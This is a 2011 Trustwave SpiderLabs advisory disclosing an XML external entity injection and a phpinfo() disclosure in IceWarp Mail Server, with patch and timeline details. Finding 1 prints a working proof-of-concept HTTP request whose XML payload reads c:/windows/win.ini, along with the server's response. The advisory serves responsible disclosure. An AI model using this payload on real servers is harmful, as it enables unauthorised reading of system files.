Trustwave's SpiderLabs Security Advisory TWSL2011-013:
Multiple Vulnerabilities in IceWarp Mail Server
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt
Published: 2011-09-23
Version: 1.0
Vendor: IceWarp (http://www.icewarp.com)
Product: IceWarp Mail Server
Version affected: 10.3.2 and below
Product description: IceWarp WebMail is the web front-end for the IceWarp
Mail Server, which provides email access on over 50,000 servers. IceWarp
WebMail provides web-based access to email, calendars, contacts, files
and shared data from any computer with a browser and Internet connection.
Credit: David Kirkpatrick of Trustwave's SpiderLabs
Finding 1: XML External Entity Injection
CVE: CVE-2011-3579
An external entity is a function of the XML specification which allows XML
documents to reference resources external to the XML document. This
functionality forces the XML parser of the application to access the
resource specified.
In this case it is possible to inject an XML DOCTYPE "SYSTEM" directive to
access local files on the operating system where the IceWarp server is
installed. Using this technique it is possible to retrieve readable files
on the operating system. This attack can also be used to create a possible
denial of service condition.
Proof-of-Concept:
The following POST request was sent to the host A.B.C.D where the IceWarp
mail server was running:
REQUEST
=========
POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1
Host:A.B.C.D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0)
Gecko/20100101 Firefox/5.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:en-gb,en;q=0.5i've
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D
Content-Length: 249
Content-Type: application/xml;charset=UTF-8
Pragma: no-cache
Cache-Control: no-cache
<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq
type="set"><query
xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c
6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc
d2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method><
/query></iq>
RESPONSE:
==========
HTTP/1.1 200 OK
Server: IceWarp/9.4.2
Date: Wed, 20 Jul 2011 10:04:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control:no-store, no-cache, must-revalidate, post-check=0,
pre-check=0 Pragma: no-cache
Content-Type: text/xml
Vary: Accept-Encoding
Content-Length: 1113
<?xml version="1.0" encoding="utf-8"?><iq type="error"><error
uid="login_invalid">test; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
....TRUNCATED
The above proof-of-concept would retrieve the c:\windows\win.ini file (the
response in this example has been truncated).
Finding 2: PHP Information Disclosure
CVE: CVE-2011-3580
It is possible to retrieve the PHP information file phpinfo() by accessing
the following URL http://A.B.C.D/server where A.B.C.D is the IP of the
server running the IceWarp software. The response will be a page detailing
the PHP version used and the configuration settings of PHP, including
system details.
Vendor Response: These issues have been addressed as of version 10.3.3
Remediation Steps: Customers should update to the latest version of IceWarp
Mail Server in order to address these issues. The above issues have been
corrected in version 10.3.3.
Revision History:
08/03/11 - Vulnerability disclosed
09/19/11 - Patch released
09/23/11 - Advisory published
About Trustwave: Trustwave is the leading provider of on-demand and
subscription-based information security and payment card industry
compliance management solutions to businesses and government entities
throughout the world. For organizations faced with today's challenging
data security and compliance environment, Trustwave provides a unique
approach with comprehensive solutions that include its flagship
TrustKeeper compliance management software and other proprietary security
solutions. Trustwave has helped thousands of organizations--ranging from
Fortune 500 businesses and large financial institutions to small and
medium-sized retailers--manage compliance and secure their network
infrastructure, data communications and critical information assets.
Trustwave is headquartered in Chicago with offices throughout North
America, South America, Europe, Africa, China and Australia. For more
information, visit https://www.trustwave.com
About Trustwave's SpiderLabs: SpiderLabs is the advance security team at
Trustwave responsible for incident response and forensics, ethical hacking
and application security tests for Trustwave's clients. SpiderLabs has
responded to hundreds of security incidents, performed thousands of ethical
hacking exercises and tested the security of hundreds of business
applications for Fortune 500 organizations. For more information visit
https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is"
without warranty of any kind. Trustwave disclaims all warranties, either
express or implied, including the warranties of merchantability and fitness
for a particular purpose. In no event shall Trustwave or its suppliers be
liable for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.